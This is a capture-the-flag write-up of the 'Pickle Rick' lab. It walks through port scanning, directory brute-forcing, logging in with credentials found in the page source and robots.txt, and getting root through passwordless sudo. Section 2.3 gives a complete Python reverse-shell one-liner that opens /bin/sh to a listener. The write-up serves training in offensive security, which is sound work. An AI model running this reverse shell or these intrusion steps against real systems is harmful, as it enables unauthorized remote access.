🥒Pickle Rick

A Rick and Morty CTF. Help turn Rick back into a human!

This Rick and Morty themed challenge requires you to exploit a webserver to find 3 ingredients that will help Rick make his potion to transform himself back into a human from a pickle.

1. Reconnaissance

1.1 Nmap

Using nmap to find open ports and services. nmap -sC -sV -oN {outputfile} {IP}

Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-08 08:13 EDT
Nmap scan report for 10.10.161.188
Host is up (0.16s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 60:dd:fc:03:86:a4:84:77:2c:4b:30:97:0d:a4:54:42 (RSA)
|   256 3b:b7:5a:17:1a:66:36:79:4c:3f:5d:88:7c:f6:c5:65 (ECDSA)
|_  256 1c:6a:00:90:ef:aa:43:fb:93:a1:36:6d:1e:d1:f8:a5 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Rick is sup4r cool
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.49 seconds

We find ports 22 (ssh) and port 80 (http) open

1.2 Gobuster

Using gobuster to brue-force web directories gobuster dir -u http://{ip} -w {wordlist} -o {outputfile} -x php,txt,html,css,js

/index.html           (Status: 200) [Size: 1062]
/login.php            (Status: 200) [Size: 882]
/assets               (Status: 301) [Size: 315] [--> http://10.10.161.188/assets/]
/portal.php           (Status: 302) [Size: 0] [--> /login.php]
/robots.txt           (Status: 200) [Size: 17]

1.3 Website

Upon navigating to the website,

Inspecting source code we see,

`Note to self, remember username!`

> Username: R1ckRul3s

Directories

Checking out the directories we got from Gobuster

/assets

fail.gif
picklerick.gif
portal.jpg
rickandmorty.jpeg

Nothing hidden in the images

/robots.txt

Wubbalubbadubdub

2. Gaining Access

Using the username we got previously and hoping that the random gibberish from robots.txt might be the password,

Username:R1ckRul3s Password: Wubbalubbadubdub

..and,we're in

We see a command panel right after login.Convenient huh?

Inspecting source code, we see

Vm1wR1UxTnRWa2RUV0d4VFlrZFNjRlV3V2t0alJsWnlWbXQwVkUxV1duaFZNakExVkcxS1NHVkliRmhoTVhCb1ZsWmFWMVpWTVVWaGVqQT0== which is a RABBIT HOLE (literally!!, keep on base64 decoding and you'll get the text "RABBIT HOLE")`

Upon further inspection, we are denied permission to all the other pages. Something about the real rick

Running ls on command panel

cat cannot run since it is disable(well, there goes our convenience)

WORKAROUND (thank you ,JOHN HAMMOND): using grep . (to grep for everything in a specific file) we find :

Sup3rS3cretPickl3Ingred.txt

1st ingredient: xx. xxxxxxx xxxx

Clue.txt : Look around the file system for the other ingredient

2.3 Reverse Shell

We can try a reverse shell to get a more stable connection since navigating the file system through the given command panel can be cumbersome.

netcat reverse shell not working.
Python3 found(which python3)
- python reverse shell from pentest monkey with netcat listening on the attacker's machine and running this command in the command panel

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' // change ip and port to your listener

Stabilizing the reverse-shell using python3 pty(not required for now,but is a cool trick)

Second ingredient can be found in /home/rick/second ingredients
2nd ingredient: x xxxxx xxxx

3 Privilege Escalation

Running sudo -l, we find that www-data can run as root without password. So sudo bash gives root access - We find 3rd ingredient.txt in /root/3rd.txt
3rd ingredient: xxxxx xxxxx

PreviousOverpass NextRootMe

Last updated 3 years ago